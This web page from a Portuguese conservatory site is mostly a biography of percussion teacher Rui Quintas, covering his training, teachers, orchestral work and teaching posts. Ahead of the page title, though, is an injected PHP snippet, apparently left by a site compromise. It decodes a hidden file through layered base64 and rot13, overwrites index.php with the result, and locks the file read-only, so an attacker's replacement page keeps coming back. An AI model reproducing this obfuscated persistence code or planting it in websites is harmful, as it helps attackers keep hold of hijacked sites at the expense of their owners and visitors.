$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Rui Quintas – Percussão – Conservatório Regional do Baixo Alentejo

Rui Quintas – Percussão

Rui Miguel Janes Quintas é natural de Reguengos de Monsaraz e nasceu a 7 de maio de 1990.

Aos 8 anos de idade iniciou os seus estudos musicais na Sociedade Filarmónica Harmonia Reguenguense, onde trabalhou com os professores: Valter Passarinho, Luís Salgado e Joaquim Medinas Carrapato.

Mais tarde ingressou no Conservatório Regional do Alto Alentejo, tendo frequentado a disciplina de Percussão com os professores Vasco Ramalho e Aldovino Munguambe.

Em 2008, foi admitido na Universidade de Évora na Licenciatura em Música – variante de Percussão, na classe do Prof. Dr. Eduardo Lopes, tendo terminado em 2011 a mesma com excelente aproveitamento.

No ano de 2011 ingressou numa pós-graduação em Marimba, na classe do Prof. Ludwig Albert e do seu assistente Prof. Lin Chin Cheng, na Artesis Hogeschool Antwerp (Antuérpia, Bélgica).

Frequenta o mestrado em Percussão, na classe do Prof. Pedro Carneiro e concluiu em 2017, o mestrado em Ensino da Música – Percussão, na classe do Prof. Richard Buckley, ambos na Escola Superior de Música de Lisboa.

Desde novo participou em estágios de orquestra, muitas vezes como músico convidado. Frequentou Masterclasses de Percussão com Pedro Carneiro, Vasco Ramalho, Eduardo Lopes, Dave Samuels, Jeffery Davis, Lin Chin Cheng, Ludwig Albert, Rui Sul Gomes, Michael Lauren, Richard Buckley, André Silva, Katarzyna Micka, Peter Vulperhorst, Roland Dénes, Theodor Milkov, Nick Woud, Pedro Segundo, Iúri Oliveira, Kai Strobel, entre outros.

Trabalhou com os maestros Jonathan Grethen, Luís Carvalho, Reinaldo Guerreiro, Jouke Hoekstra, Carlos Amarelinho, Alberto Roque, José Filipe Guerreiro, Rafael Agulló Albors, Francisco Ferreira, Carlos Marques, António Menino, Mitchell Fennell, João Defeza, Tiago Alves, Pedro Sobral Santos, Élio Murcho, Rui Silva, António Rosado, Artur Rouquina, Christopher Bochmann, Yan Mikirtumov e Jorge Salgueiro.

Colaborou com a Orquestra Sinfónica Juvenil, Orquestra de Câmara de Almada e Orquestra de Câmara do Alentejo.

Apresenta-se regularmente a solo, tendo sido acompanhado por diversas formações, tais como: Banda da Sociedade Filarmónica Harmonia Reguenguense, Orquestra de Sopros e Percussão de A-dos-Francos, Grupo de Percussão de Reguengos de Monsaraz e Banda de Música da Força Aérea Portuguesa.

É habitualmente convidado a orientar o naipe de Percussão em inúmeros Estágios de Orquestra de Sopros e Percussão em Portugal continental e ilhas.

Foi percussionista da Banda de Música da Força Aérea Portuguesa e docente da disciplina de Percussão na Escola de Artes de Sines, no Conservatório de Música da Metropolitana e no Conservatório Regional de Évora.

É atualmente docente da disciplina de Percussão no Conservatório Regional do Alto Alentejo – Reguengos de Monsaraz e no Conservatório Regional do Baixo Alentejo – Beja.

É diretor artístico do Festival Internacional de Percussão do Alentejo Central – Reguengos de Monsaraz (FIPAC).

Rui Quintas é Endorser das marcas REMO, ZILDJIAN e INNOVATIVE PERCUSSION.